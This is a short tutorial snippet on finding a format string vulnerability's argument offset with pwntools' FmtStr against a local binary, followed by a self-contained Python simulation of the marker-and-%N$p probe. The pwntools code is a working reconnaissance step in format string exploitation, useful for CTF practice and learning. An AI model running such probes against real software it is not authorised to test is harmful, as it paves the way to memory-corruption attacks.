With this code you can efficiently calculate the offset of a format string vulnerability, i.e. the argument position at which printf starts reading your own input, using pwntools' FmtStr class.

from pwnlib.fmtstr import FmtStr
from pwn import *

context.clear(arch='amd64')

def send_payload(payload):
    # FmtStr calls this with each probe string and inspects the reply
    # to find the position at which the probe is reflected.
    s.sendline(payload)
    r = s.recvline()   # line containing the formatted output
    s.recvline()       # discard the extra line the program prints afterwards
    return r

s = process('./format')
print(FmtStr(execute_fmt=send_payload).offset)
...
[*] Found format string offset: 6
6
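To make clear what FmtStr is doing behind `execute_fmt`, here is an added, self-contained model of the offset search. This is example code written for this page, not pwntools' implementation and not the `./format` binary: the "vulnerable program" is simulated in-process with a tiny printf emulator that understands only `%p` and `%N$p`, the filler value `JUNK` and the buffer position `offset` are constructed, and `find_offset` reproduces the idea of sending a marker followed by `%N$p` and looking for the marker in the reflected output.

```python
import re
import struct

WORD = 8  # amd64: each positional printf argument is one 8-byte word

# Constructed filler value standing in for unrelated register/stack contents.
JUNK = 0x00007ffc1234abc0


def simulated_printf(fmt: bytes, args: list[int]) -> bytes:
    """Tiny printf model that understands only %p and %N$p.

    'args' is the sequence of 64-bit values printf would fetch as its
    variadic arguments (register arguments first, then stack words).
    """
    out = bytearray()
    next_arg = 0  # index consumed by a plain %p (sequential arguments)
    i = 0
    while i < len(fmt):
        if fmt[i:i + 1] != b"%":
            out += fmt[i:i + 1]
            i += 1
            continue
        m = re.match(rb"%(?:(\d+)\$)?p", fmt[i:])
        if m is None:  # unsupported conversion: echo the '%' literally
            out += b"%"
            i += 1
            continue
        if m.group(1):
            idx = int(m.group(1)) - 1  # %N$p is 1-based
        else:
            idx = next_arg
            next_arg += 1
        val = args[idx] if idx < len(args) else 0
        out += b"0x%x" % val
        i += m.end()
    return bytes(out)


def vulnerable_program(payload: bytes, offset: int) -> bytes:
    """Model of a program that calls printf(user_input) (constructed target).

    The user's buffer sits 'offset' positions into the argument list, so
    %<offset>$p reads back the first 8 bytes of the payload itself.
    """
    padded = payload + b"\x00" * (-len(payload) % WORD)
    buffer_words = [struct.unpack("<Q", padded[i:i + WORD])[0]
                    for i in range(0, len(padded), WORD)]
    args = [JUNK] * (offset - 1) + buffer_words
    return simulated_printf(payload, args)


def find_offset(execute_fmt, marker: bytes = b"AAAAAAAA", max_offset: int = 64):
    """Locate the argument index at which the format string buffer appears.

    Same principle as FmtStr: send an 8-byte marker followed by %N$p for
    increasing N and stop when the marker's value is reflected back.
    """
    expected = b"0x%x" % struct.unpack("<Q", marker)[0]
    for n in range(1, max_offset + 1):
        probe = marker + b"%%%d$p" % n
        if expected in execute_fmt(probe):
            return n
    return None


if __name__ == "__main__":
    # Constructed target whose buffer starts at argument 6, as in the post.
    print(find_offset(lambda p: vulnerable_program(p, offset=6)))
```

With the constructed target placed at argument 6 the search returns 6, matching the output shown above; a target that never reflects the marker yields `None`, which is the case to watch for when the real program truncates or filters its output.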
Last modified: July 2, 2021
